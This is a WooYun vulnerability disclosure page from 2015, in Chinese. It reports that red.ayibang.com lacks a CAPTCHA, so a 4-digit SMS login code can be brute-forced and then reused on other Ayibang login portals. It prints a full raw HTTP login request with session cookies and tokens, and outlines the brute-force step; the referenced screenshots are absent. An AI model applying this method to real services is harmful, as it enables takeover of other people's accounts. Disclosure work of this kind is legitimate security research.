乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-27: 细节已通知厂商并且等待厂商处理中 2015-11-01: 厂商已经主动忽略漏洞,细节向公众公开
阿姨帮任意用户登录
阿姨帮任意用户登录问题网站:red.ayibang.com HI~你好~并未与WooYun-2015-122517 重复,域名不同
red.ayibang.com可以登录阿姨帮,且没有验证码,而爆破出的手机登录验证码可用于多个平台登录
POST /login HTTP/1.1Host: red.ayibang.comProxy-Connection: keep-aliveContent-Length: 593Accept: application/jsonOrigin: http://red.ayibang.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36Content-Type: application/x-www-form-urlencodedReferer: http://red.ayibang.com/login?data=YTo1OntzOjEwOiJvcmRlcl90aW1lIjtzOjE2OiIyMDE1LTEwLTI4IDEwOjAwIjtzOjEzOiJvcmRlcl9hZGRyZXNzIjtzOjQ6InpjYXMiO3M6NDoiYXJlYSI7czo5OiJ1bmRlZmluZWQiO3M6Nzoia2V5d29yZCI7czoyMDoicHJvamVjdF9jbGVhbl9mcmlkZ2UiO3M6MTI6Im9yZGVyX3JlbWFyayI7czo3OiJkYXNkYXNkIjt9&return_url=/appointment/?keyword=project_clean_fridgeAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=29dbme5s6qol1ldu2ut5ruucv1; Hm_lvt_26a1b3a2f43711fdc32ef64c66a91ec0=1445855848; Hm_lpvt_26a1b3a2f43711fdc32ef64c66a91ec0=1445857939; city=HutcOBNxHtBQ1Zt9Vf1bPK5HlALWxCB%2FOysewRC7UNE%3D; token=jEjKL0ScM2Sv160VZ4mawLDSW6N8eUmgMrIGw8%2BxPxw%3DConnection: closephone=13333333333&code=5621&return_url=%2Fappointment%2F%3Fkeyword%3Dproject_clean_fridge%26data%3DYTo1OntzOjEwOiJvcmRlcl90aW1lIjtzOjE2OiIyMDE1LTEwLTI4IDEwOjAwIjtzOjEzOiJvcmRlcl9hZGRyZXNzIjtzOjQ6InpjYXMiO3M6NDoiYXJlYSI7czo5OiJ1bmRlZmluZWQiO3M6Nzoia2V5d29yZCI7czoyMDoicHJvamVjdF9jbGVhbl9mcmlkZ2UiO3M6MTI6Im9yZGVyX3JlbWFyayI7czo3OiJkYXNkYXNkIjt9&data=YTo1OntzOjEwOiJvcmRlcl90aW1lIjtzOjE2OiIyMDE1LTEwLTI4IDEwOjAwIjtzOjEzOiJvcmRlcl9hZGRyZXNzIjtzOjQ6InpjYXMiO3M6NDoiYXJlYSI7czo5OiJ1bmRlZmluZWQiO3M6Nzoia2V5d29yZCI7czoyMDoicHJvamVjdF9jbGVhbl9mcmlkZ2UiO3M6MTI6Im9yZGVyX3JlbWFyayI7czo3OiJkYXNkYXNkIjt9
以手机13333333333为例:
抓包并爆破,成功跑出4位验证码:
看一下成功与失败的返回包:
===== 然后这个验证码可以在任意登陆端口进行登录,包括手机端和WEB端,例如http://www.ayibang.com/order?_m= 用这个验证码登陆成功:
都在上面
危害等级:无影响厂商忽略
忽略时间:2015-11-01 17:26
漏洞Rank:2 (WooYun评价)
暂无